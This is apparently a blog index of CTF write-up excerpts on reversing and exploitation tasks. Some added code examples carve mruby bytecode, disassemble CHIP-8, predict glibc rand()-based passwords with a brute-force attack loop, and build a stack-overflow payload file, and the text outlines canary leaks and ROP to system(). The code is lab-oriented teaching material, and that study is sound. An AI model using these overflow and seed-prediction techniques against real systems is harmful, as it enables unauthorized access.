Nuit du Hack CTF Quals 2018 - AssemblyMe - Rev300 - Writeup
Hi,
I haven't published a CTF writeup in a while, and now I'm back with a write-up that shows how I solved the task in a few minutes :p
We were given a web page which asks for an authentication password.
http://assemblyme.challs.malice.fr
The goal is to reverse engineer the code and figure out the correct password.
The steps I followed to solve the challenge were:
[+] Read the web page source code
[+] Invoke the authentication function from the Chrome console
European Cyber Week CTF 2017 - Red Diamond - Writeup
Hi,
European Cyber Week CTF is a contest exclusively reserved for “European” students.
I'm not eligible to play, but I joined the CTF later in order to keep practicing and learn new stuff.
Red Diamond in the Binary category was the hardest task judging by the number of players who solved it (7 solves).
The given file was a Windows binary for AMD64!
I imported the binary file into IDA Pro, then, with a top-down look at the string list, I saw many paths to mruby header files such as /home/FlL/mruby1.3.0/mruby/include/mruby/value.h
I "googled" mruby. It is a lightweight implementation of the Ruby language. From this point I figured out that my mission would be hard because I had never written a single line of Ruby code. But remember that my goal is to learn new stuff! So! Let's do it!
mruby can be linked into and embedded within an application, which is the case here. In addition, Ruby programs can be compiled to bytecode with the mruby compiler (mrbc).
So the challenge file is an application that embeds mruby bytecode together with the interpreter.
I spent some time reading about MRB file format and RiteVM.
An MRB file starts with RITE00… as its magic number. I searched for that pattern inside the binary and, yes!, I found it.
The bytecode program starts from offset 0x80A20 in the file (0x100482020 offset in memory)
I dumped the bytecode to a red_diamond.mrb file.
The mruby package provides an interpreter program, mruby. I downloaded the mruby sources and compiled them.
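Carving the bytecode by hand from offset 0x80A20 works, but a small script that locates every RITE header, reads the size field and verifies the header checksum makes the dump repeatable and catches a truncated copy. The following is an added example, not the tooling from the write-up; the header layout it assumes is mruby 1.x's struct rite_binary_header ("RITE", 4-byte format version, 2-byte CRC, 4-byte big-endian total size, 4-byte compiler name, 4-byte compiler version, then sections ending with an "END\0" section), and the sample image it builds to exercise itself is constructed, not taken from the challenge.

```python
"""Carve mruby RITE bytecode images out of a larger binary.

Added example, not the write-up's tooling. Header layout assumed from the
mruby 1.x sources (struct rite_binary_header, 22 bytes):
  "RITE" | format version (4) | CRC-16 (2) | total size (4, big-endian)
  | compiler name (4) | compiler version (4) | sections ... | "END\\0" section
The CRC is CRC-16/CCITT (XMODEM flavour) over everything after the CRC field.
"""
import struct

RITE_MAGIC = b"RITE"
HEADER_LEN = 22          # sizeof(struct rite_binary_header)
CRC_BODY_OFFSET = 10     # CRC covers bytes [10:size), i.e. from binary_size onward
END_SECTION = b"END\0" + struct.pack(">I", 8)   # section ident + section size


def crc16_ccitt(data: bytes, crc: int = 0) -> int:
    """CRC-16/CCITT as in mruby's calc_crc_16_ccitt: polynomial 0x1021,
    initial value 0, MSB first, no final XOR (the XMODEM variant)."""
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc


def parse_rite_header(blob: bytes, off: int) -> dict:
    ident, version, crc, size, cname, cver = struct.unpack_from(">4s4sHI4s4s", blob, off)
    return {"offset": off, "ident": ident, "version": version.decode("ascii", "replace"),
            "crc": crc, "size": size, "compiler": cname + cver}


def carve_mrb(blob: bytes) -> list:
    """Return every plausible RITE image found in blob, with integrity flags."""
    found = []
    off = blob.find(RITE_MAGIC)
    while off != -1:
        if off + HEADER_LEN <= len(blob):
            hdr = parse_rite_header(blob, off)
            end = off + hdr["size"]
            if HEADER_LEN + len(END_SECTION) <= hdr["size"] and end <= len(blob):
                data = blob[off:end]
                hdr["crc_ok"] = crc16_ccitt(data[CRC_BODY_OFFSET:]) == hdr["crc"]
                hdr["end_ok"] = data.endswith(END_SECTION)
                hdr["data"] = data
                found.append(hdr)
        off = blob.find(RITE_MAGIC, off + 1)
    return found


def build_sample_mrb(version: bytes = b"0004", body: bytes = b"") -> bytes:
    """Constructed, structurally minimal image (header + body + END section)
    with a valid CRC; used only to exercise the carver offline."""
    size = HEADER_LEN + len(body) + len(END_SECTION)
    tail = struct.pack(">I", size) + b"MATZ" + b"0000" + body + END_SECTION
    return RITE_MAGIC + version + struct.pack(">H", crc16_ccitt(tail)) + tail


if __name__ == "__main__":
    # constructed input: padding, one valid image, then a decoy "RITE" with no room for a header
    sample = b"\x90" * 0x40 + build_sample_mrb() + b"RITE" + b"\xff" * 8
    for hit in carve_mrb(sample):
        print(f"RITE at {hit['offset']:#x}: version {hit['version']}, size {hit['size']}, "
              f"crc_ok={hit['crc_ok']}, end_ok={hit['end_ok']}")
        with open(f"carved_{hit['offset']:x}.mrb", "wb") as fh:
            fh.write(hit["data"])
```

Run it over the challenge executable instead of the constructed sample and the reported offset should be the 0x80A20 found by hand; a hit with crc_ok false means the size field or the dump is wrong. The carved file can then be fed to the compiled interpreter with mruby -b.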
Kaspersky Industrial CTF Quals 2017 - Web Keygen - rev700 - Writeup
Hi,
Despite its category, this was not really a web task but a reversing one. The task implements a relatively small and straightforward custom VM interpreter in JavaScript.
crackme! http://95.85.55.168/vmctf.html_
Here is my solver in case you want to skip the explanation:
DefCamp CTF Qualification 2017 - Chio - rev360 - Writeup
Hi,
The task is worth 360 pts. I was the first solver and earned bonus points, but I didn't like the fact that a hint was released a few hours before the end of the CTF, since a few teams had already solved the challenge without hints and with a lot of guessing, which is totally unfair.
The hardest part of the challenge was to determine the target architecture of the provided binary file.
The given binary is a CHIP-8 ROM file. This information was not mentioned in the task statement; however, the task title gave me a hint about the target CPU.
Disassemble the binary with a CHIP-8 disassembler:
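CHIP-8 is small enough that writing the disassembler is quicker than hunting for one: every instruction is a 16-bit big-endian word, programs load at 0x200, and the few addressing forms are encoded in the opcode nibbles. The following is an added example, not the disassembler used in the write-up; it uses Cowgod-style mnemonics, and the ROM it disassembles in the usage block is constructed.

```python
"""Minimal CHIP-8 disassembler. Added example, not the write-up's tool.
Each CHIP-8 instruction is one 16-bit big-endian word; ROMs are loaded at
0x200, so the addresses in JP/CALL/LD I are absolute."""
ROM_BASE = 0x200

ALU = {0x0: "LD", 0x1: "OR", 0x2: "AND", 0x3: "XOR", 0x4: "ADD",
       0x5: "SUB", 0x6: "SHR", 0x7: "SUBN", 0xE: "SHL"}
FX = {0x07: "LD V{x}, DT", 0x0A: "LD V{x}, K", 0x15: "LD DT, V{x}",
      0x18: "LD ST, V{x}", 0x1E: "ADD I, V{x}", 0x29: "LD F, V{x}",
      0x33: "LD B, V{x}", 0x55: "LD [I], V{x}", 0x65: "LD V{x}, [I]"}


def decode(op: int) -> str:
    """Mnemonic for one 16-bit opcode; unknown words are emitted as DW so
    sprite data embedded in the ROM stays visible in the listing."""
    top, x, y, n = op >> 12, (op >> 8) & 0xF, (op >> 4) & 0xF, op & 0xF
    nn, nnn = op & 0xFF, op & 0xFFF
    if op == 0x00E0:
        return "CLS"
    if op == 0x00EE:
        return "RET"
    if top == 0x0:
        return f"SYS {nnn:#05x}"
    if top == 0x1:
        return f"JP {nnn:#05x}"
    if top == 0x2:
        return f"CALL {nnn:#05x}"
    if top == 0x3:
        return f"SE V{x:X}, {nn:#04x}"
    if top == 0x4:
        return f"SNE V{x:X}, {nn:#04x}"
    if top == 0x5 and n == 0:
        return f"SE V{x:X}, V{y:X}"
    if top == 0x6:
        return f"LD V{x:X}, {nn:#04x}"
    if top == 0x7:
        return f"ADD V{x:X}, {nn:#04x}"
    if top == 0x8 and n in ALU:
        return f"{ALU[n]} V{x:X}, V{y:X}"
    if top == 0x9 and n == 0:
        return f"SNE V{x:X}, V{y:X}"
    if top == 0xA:
        return f"LD I, {nnn:#05x}"
    if top == 0xB:
        return f"JP V0, {nnn:#05x}"
    if top == 0xC:
        return f"RND V{x:X}, {nn:#04x}"
    if top == 0xD:
        return f"DRW V{x:X}, V{y:X}, {n}"
    if top == 0xE and nn == 0x9E:
        return f"SKP V{x:X}"
    if top == 0xE and nn == 0xA1:
        return f"SKNP V{x:X}"
    if top == 0xF and nn in FX:
        return FX[nn].format(x=f"{x:X}")
    return f"DW {op:#06x}"


def disassemble(rom: bytes, base: int = ROM_BASE) -> list:
    """Linear sweep: (address, opcode, mnemonic) per word; an odd trailing
    byte is reported as DB."""
    listing = []
    for i in range(0, len(rom) - 1, 2):
        op = (rom[i] << 8) | rom[i + 1]
        listing.append((base + i, op, decode(op)))
    if len(rom) % 2:
        listing.append((base + len(rom) - 1, rom[-1], f"DB {rom[-1]:#04x}"))
    return listing


def branch_targets(listing: list) -> set:
    """Absolute targets of JP/CALL: a quick way to separate code from sprite
    data and to find the callers of a comparison routine."""
    return {op & 0xFFF for _addr, op, _m in listing if op >> 12 in (0x1, 0x2)}


if __name__ == "__main__":
    # constructed ROM: clear screen, set VA/VB, point I at the sprite at 0x20C, draw, loop
    rom = bytes.fromhex("00E0 6A02 6B0C A20C DAB6 1208 F0 90 F0 90 F0")
    for addr, op, mnem in disassemble(rom):
        print(f"{addr:#05x}: {op:04x}  {mnem}")
    print("branch targets:", sorted(hex(t) for t in branch_targets(disassemble(rom))))
```

Linear sweep is fine here because CHIP-8 code is word aligned, but sprite bytes that happen to look like opcodes will still decode as instructions; cross-checking the addresses loaded into I (the sprite pointers) against the branch targets separates the two quickly.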
CSAW CTF Qualification Round 2017- realism - rev400 - Writeup
Hi,
This is a quick and dirty writeup for realism task.
The binary is a 16-bit bootloader.
The flag checking function is based on PSADBW instruction.
According to documentation, the instruction computes the absolute value of the difference of 8 unsigned byte integers from the source operand (second operand) and from the destination operand (first operand). These 8 differences are then summed to produce an unsigned word integer result that is stored in the destination operand.
In the given program the instruction operates on xmm2 and xmm5 registers.
When operating on 128-bit operands, two packed results are computed. Here, the 8 low-order bytes of the source and destination operands are operated on to produce a word result that is stored in the low word of the destination operand, and the 8 high-order bytes are operated on to produce a word result that is stored in bits 64 through 79 of the destination operand. The remaining bytes of the destination operand are cleared.
Then the computed sums of absolute differences are compared against the expected result. 2 chars are compared at a time.
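Modelling the instruction in software makes the pair-wise check easy to brute-force, and also exposes the caveat that matters when solving: a sum of absolute differences does not pin down a byte, since |a - b| = d has two solutions for a, so some pairs come back with several printable candidates. The following is an added example, not the author's solver; the contents of xmm5, the placement of the two flag bytes (one at the start of each 64-bit lane) and the flag itself are hypothetical.

```python
"""Software model of PSADBW plus a pair-at-a-time recovery. Added example,
not the write-up's solver; the xmm5 constant, the byte layout and the flag
used below are hypothetical."""
from itertools import product
import string

PRINTABLE = (string.digits + string.ascii_letters + string.punctuation + " ").encode()


def psadbw(dst: bytes, src: bytes) -> int:
    """PSADBW xmm_dst, xmm_src on 128-bit operands: per 64-bit lane, the sum
    of |dst[i] - src[i]| over 8 bytes. The low lane's sum lands in bits 0..15,
    the high lane's in bits 64..79; every other bit of the result is cleared."""
    assert len(dst) == 16 and len(src) == 16
    lo = sum(abs(a - b) for a, b in zip(dst[:8], src[:8]))
    hi = sum(abs(a - b) for a, b in zip(dst[8:], src[8:]))
    return lo | (hi << 64)


def sad_lanes(result: int) -> tuple:
    """The two word results as the checker reads them."""
    return result & 0xFFFF, (result >> 64) & 0xFFFF


def pair_block(pair: bytes) -> bytes:
    """Hypothetical layout: one flag byte at the start of each lane, the rest
    zero, so each lane sum depends on exactly one unknown byte."""
    return bytes([pair[0]]) + b"\0" * 7 + bytes([pair[1]]) + b"\0" * 7


def lane_sums_for_pair(pair: bytes, key: bytes) -> tuple:
    return sad_lanes(psadbw(pair_block(pair), key))


def recover_pair(expected: tuple, key: bytes, alphabet: bytes = PRINTABLE) -> list:
    """Every printable pair whose lane sums match. More than one hit means the
    comparison is ambiguous and the flag format (or a later pair) has to
    disambiguate, because |a - b| = d has up to two solutions for a."""
    return [bytes(p) for p in product(alphabet, repeat=2)
            if lane_sums_for_pair(bytes(p), key) == expected]


def recover_flag(expected_sums: list, key: bytes) -> list:
    """All flags consistent with the observed per-pair sums."""
    per_pair = [recover_pair(e, key) for e in expected_sums]
    return [b"".join(parts) for parts in product(*per_pair)]


if __name__ == "__main__":
    key = bytes(range(0x10, 0x20))                 # hypothetical xmm5 contents
    flag = b"flag{sad!}"                           # hypothetical, even length
    sums = [lane_sums_for_pair(flag[i:i + 2], key) for i in range(0, len(flag), 2)]
    print("observed lane sums:", sums)
    print("candidates:", recover_flag(sums, key))   # unique here: key bytes are below ' '
    print("ambiguous pair:", recover_pair(lane_sums_for_pair(b"fl", b"\x60" * 16), b"\x60" * 16))
```

With a constant whose bytes are below the printable range only one solution per lane is printable, which is the comfortable case; when the constant sits inside the printable range (the 0x60 example above) each lane yields two candidates and the pair check alone accepts four different inputs.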
Following is my solver:
European Cyber Week CTF - Pwn350 + Rev250 - Writeup
Hi,
This time I will just publish the exploits I wrote to solve the tasks.
The QUIZZZZ - Pwn350
- Leak Canary Value
- Leak Stack Address (2 bytes)
- Brute force the remaining byte
- ROP chain to run a command
3DS CTF 2016 - High Power Computing - rev500 - writeup
Hello,
We were given a program which is supposed to print the flag at the end of its execution. The first run prints that it will take days to finish. The question to answer is: what makes it take so much time? The quick answer: simple operations such as multiplication, division, modulo, exponentiation… are implemented with loops. The program has several functions such as um(), feliz(), natal(), ano()… and each function is responsible for a specific operation.
The job is simply to analyse the functions one by one, figure out what each does, and simplify it using arithmetic operators or optimized functions.
For example let’s start with um() function
Hackit CTF 2016 - t2yh4rd - pwn200 - writeup
Hello,
This writeup will be quick and dirty. The idea behind the challenge is to guess a randomly generated password to win the game and get a shell. You lose the game after 3 bad tries.
I spent much time reversing the binary to figure out how the password is generated, because this was the first time I had dealt with a Position Independent Executable.
Well, to solve the task all we need is to guess the value used to seed the random number generator. This way we can determine the generated password.
The seed is calculated from the current timestamp and the current process id. We don't know the pid, so we have to brute-force it. But we only have 3 tries! Easy! Just overflow the buffer on the stack into the "tries" variable to get infinite tries. That's all!
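The plan above needs two pieces: a local copy of the target's random number generator, so each candidate seed can be turned into the password it would produce, and a loop that submits one candidate per pid once the tries limit is gone. The following is an added example, not the author's C exploit. The glibc_rand() function is a faithful reimplementation of glibc's default rand() (the TYPE_3 additive feedback generator), which is what a Linux binary calling srand()/rand() uses; the seed formula (timestamp XOR pid), the password length and the alphabet are hypothetical, since the write-up does not give them, and the "server" in the usage block is a constructed stand-in.

```python
"""Predicting an srand()/rand()-derived password and enumerating the PID.
Added example, not the author's C exploit. glibc_rand() reproduces glibc's
TYPE_3 rand(); make_seed(), password_from_seed() and ALPHABET are
hypothetical stand-ins for what the binary actually does."""
import string

ALPHABET = string.ascii_letters + string.digits   # hypothetical password alphabet


def _c_div(a: int, b: int) -> int:
    """C integer division (truncates toward zero)."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def glibc_rand(seed: int, count: int) -> list:
    """First `count` values of rand() after srand(seed) on glibc: a 31-word
    additive feedback generator seeded by a Park-Miller LCG (Schrage's
    method), with the first 344 outputs discarded."""
    seed &= 0xFFFFFFFF
    if seed == 0:
        seed = 1
    word = seed - (1 << 32) if seed & 0x80000000 else seed     # int32_t view of the seed
    r = [seed]
    for _ in range(1, 31):
        hi = _c_div(word, 127773)
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r.append(word & 0xFFFFFFFF)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
    return [v >> 1 for v in r[344:]]                           # rand() drops the low bit


def password_from_seed(seed: int, length: int = 8) -> str:
    """Hypothetical derivation: one rand() call per character, reduced mod alphabet."""
    return "".join(ALPHABET[v % len(ALPHABET)] for v in glibc_rand(seed, length))


def make_seed(timestamp: int, pid: int) -> int:
    """Hypothetical mixing of time() and getpid(); replace with the formula
    recovered from the binary."""
    return (timestamp ^ pid) & 0xFFFFFFFF


def candidate_passwords(timestamp: int, pid_max: int = 32768):
    """Lazily yield (pid, password) for every PID the kernel could have assigned."""
    for pid in range(1, pid_max):
        yield pid, password_from_seed(make_seed(timestamp, pid))


def attack(check, timestamp: int, pid_max: int = 32768):
    """Submit each candidate in turn; returns (pid, password, tries) or None.
    Only feasible once the 3-try limit is gone, i.e. after overflowing the
    tries counter as described above."""
    for tries, (pid, pw) in enumerate(candidate_passwords(timestamp, pid_max), 1):
        if check(pw):
            return pid, pw, tries
    return None


if __name__ == "__main__":
    ts, secret_pid = 1461400000, 1234                       # constructed target
    server_pw = password_from_seed(make_seed(ts, secret_pid))
    print(attack(lambda pw: pw == server_pw, ts))             # (1234, server_pw, 1234)
```

Against the real service the check callback would send the guess over the socket and look at the reply, and the timestamp would be taken at connect time; if the clock on the server may be off by a second or two, loop the same pid range over a small window of timestamps.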
Here is the exploit. Don’t ask me why I wrote it in C !
Hackit CTF 2016 - L4bR4t - rev375 - writeup
Hello,
In this task we were given a shared library "SecretLabXLib.so" and a zip file containing an encrypted and a plain JPEG file.
Task description:
There were some photos of an unknown experiment taken in a secret lab-X for their internal archive. After that, the device from which the shot was made immediately loaded a crypto-trigger, whose function is to ensure the confidentiality of image data (this is exactly how it should be in super-secret laboratories?).
It is known that, due to some floating code errors, the trigger did not complete its work and not all the photos were encrypted.
We managed to get a binary, which has something to do with that crypto-trigger software.
And now we have a good chance to find out what secrets hides laboratory-X.
The first step I did is printing the symbol table of the shared library to figure out what functions are exported.
Analyzing the shared object
By running objdump -T I got mangled symbol names. Demangling can be done with nm -C (or by piping the output through c++filt).
CSAW CTF Qualification Round 2016 - Tutorial - Pwn200 - Writeup
Hello,
In this task we were given a binary file with NX enabled, a stack canary present, and ASLR enabled on the remote server.
The first function prints the address of the puts function in libc (-0x500).
The second function prints the canary and part of a stack address (4 bytes).
With the libc given in addition to all this leaked information, we can rebuild the process layout in memory and build our payload.
Below is the exploit I wrote to pwn the service, the script process as follows:
- Leak puts() address.
- Calculate system() address.
- Leak Canary value.
- Leak a Stack address.
- Calculate the receive buffer address.
- Place the command to be executed in the receive buffer.
- Place the canary
- ROP to system with the receive buffer address as argument.
- Put all together
- Enjoy !
IceCTF 2016 - Slicker Server - pwn300 - writeup
Hi,
Well, my team Pwnium finished 4th in this CTF. We missed only one Stego task. The CTF was great and a lot of original tasks were proposed. I decided to write up the Slicker Server task in the pwn category since it was the hardest one and was worth 300 points.
In this task we were given a binary file named asmttpd (referring to https://github.com/nemasu/asmttpd) which is a HTTP server for Linux written in assembly.
The source code was modified to add a kind of backdoor which leaves a buffer overflow vulnerability. To exploit the vulnerability you have to satisfy a certain condition in an HMAC function to take control of the program.
Let’s start analyzing the binary.
When you import the binary into IDA Pro, you can easily see that the program uses raw system calls instead of library functions for networking, threading and file system operations.
The program sets up the webroot directory specified as argument, then starts listening for incoming connections on port 6601. For each accepted client a worker_thread is created.
Nuit du Hack 2016 Quals - Matryoshka4 - Crack500 - Writeup
Hi, I'm a member of Pwnium, a Tunisian CTF team. We were ranked #31 in this CTF because only 2 of us played. I hope we will do better next CTF ;)
This task was the 4th level of the Crack series of NDH tasks. The previous levels were quite easy except the last level, which was tricky (as they said).
file stage4.bin
stage4.bin: DOS/MBR boot sector
Nuit du Hack 2016 Quals - Secure File Reader - Pwn200 - Writeup
Hi,
I'm a member of Pwnium, a Tunisian CTF team. We were ranked #31 in this CTF! Nice rank for a team of 2 members, right?
I hope we will do better next CTF ;)
The binary takes a filename as argument and checks that the file size is less than 4096; if so it dumps the content into a buffer, otherwise the program prints an error message.
Using GDB, let's try to make the program accept a big file. To do this I changed the value returned by the check_size function to 1.
(python -c 'print "A"*4200') > /tmp/big
gdb pwn
gdb-peda$ b *0x08048F1A
gdb-peda$ r /tmp/big
gdb-peda$ set $eax=1
gdb-peda$ c
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$ i r eip
eip 0x41414141 0x41414141
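EIP = 0x41414141 proves control of the return address but not where in the 4200-byte file it lands, and "A"*4200 cannot tell you. The usual next step is to regenerate the file from a non-repeating pattern, read EIP again, and search the pattern for those four bytes. The following is an added example, not the author's exploit; it is the Metasploit pattern_create/pattern_offset scheme written out, and the EIP value and return address in the usage block are constructed.

```python
"""Finding the saved-EIP offset in the 4200-byte crash file with a
non-repeating pattern, then rebuilding the file with a chosen address.
Added example, not the author's exploit; the EIP value and return address
used below are constructed."""
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # unique Aa0..Zz9 triplets before the pattern repeats


def pattern_create(length: int) -> bytes:
    """Uppercase/lowercase/digit triplets; every 4-byte window is unique up
    to MAX_PATTERN bytes, so an offset lookup has a single answer."""
    if length > MAX_PATTERN:
        raise ValueError(f"pattern repeats after {MAX_PATTERN} bytes")
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, value: int, width: int = 4) -> int:
    """Offset of the register value seen in the debugger. x86 is little-endian,
    so EIP=0x41336141 means the bytes 'A','a','3','A' sat on the stack in
    that order; returns -1 if the value did not come from the pattern."""
    return pattern.find(value.to_bytes(width, "little"))


def build_payload(offset: int, ret_addr: int, total: int = 4200, filler: bytes = b"A") -> bytes:
    """Filler up to the saved EIP, the new return address, then more filler so
    the file keeps the size that already goes through the check_size bypass."""
    if offset + 4 > total:
        raise ValueError("offset beyond payload size")
    body = filler * offset + struct.pack("<I", ret_addr)
    return body + filler * (total - len(body))


if __name__ == "__main__":
    pattern = pattern_create(4200)
    # step 1: write the pattern instead of "A"*4200, rerun under gdb, read EIP
    crashed_eip = 0x41336141                     # constructed: what gdb would show
    off = pattern_offset(pattern, crashed_eip)
    print("saved EIP is at offset", off)          # 9 for this constructed value
    # step 2: rebuild /tmp/big with the target address at that offset
    with open("/tmp/big", "wb") as fh:
        fh.write(build_payload(off, 0xdeadbeef))
```

If the file must stay larger than 4096 for the size-check trick, keep total at 4200 as above; if the overflow instead requires a shorter input, shrink total but keep offset fixed, since the distance from the buffer start to the saved EIP does not change with the file size.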
CSAW CTF 2014 - Saturn - Pwn400 - Writeup
Hello,
The task was about bypassing a challenge-response authentication system without having access to the library that checks the submitted response. The first run of the binary gives a message telling that libchallengeresponse.so is missing.
Boston Key Party 2014 CTF - Decrypt Img - Reversing200 - Writeup
The task :
We encrypted an image that we drew in paint, but lost the original! Can you recover it for us?
Challenge file
First, the program is compiled for Win8 using the new Win8 API, so it can be executed only on Win8 or, in some cases, under Wine. I don't have a Win8 machine, so I tried to write a program that uses the Crypt DLL to perform the encryption.
The encryption function signature is the following:
void encrypt(uint8_t file[], int32_t length, uint8_t key[], int32_t keylen);
In our case the image file is encrypted using a 54-byte key.
Codegate CTF 2014 - RE250 - Clone Technique - Writeup
Hi !
On executing the file, the process is duplicated 400 times. Each process creates its child with a command line that contains 3 arguments. The first and second arguments are numbers used in a hashing function and also used to generate the next process's arguments. The third argument is the process number. So the task is essentially about finding which child process contains the flag (or what the correct args to pass to the program are). My approach to solve the task was first to generate the correct argument sequence, then pass them to the hashing function "sub_401070" with a string at .text:00401149, and try to figure out the result.
EBCTF 2013 - WEB200 - Writeup
Hi !
Challenge WEB200 “Hipster NoSQL hangout” We found a place where the hipster NoSQL admins hang out and share their secrets. We understood this new cutting edge technology is very secure, can you break in?
By googling these commands (listed on the login page) we can identify the database system used.
PSUBSCRIBE, PUBSUB, PUBLISH, PUNSUBSCRIBE, SUBSCRIBE, UNSUBSCRIBE, DISCARD, EXEC, UNWATCH, WATCH, MULTI, EVAL, EVALSHA, ECHO, BGREWRITEAOF, BGSAVE, CLIENT, CONFIG, DEBUG, MONITOR, SAVE, SHUTDOWN, SLAVEOF and SLOWLOG
It is Redis (REmote DIctionary Server), an in-memory key-value store.
Now we inject some values into the login form; the pair foo/bar gives "User not found".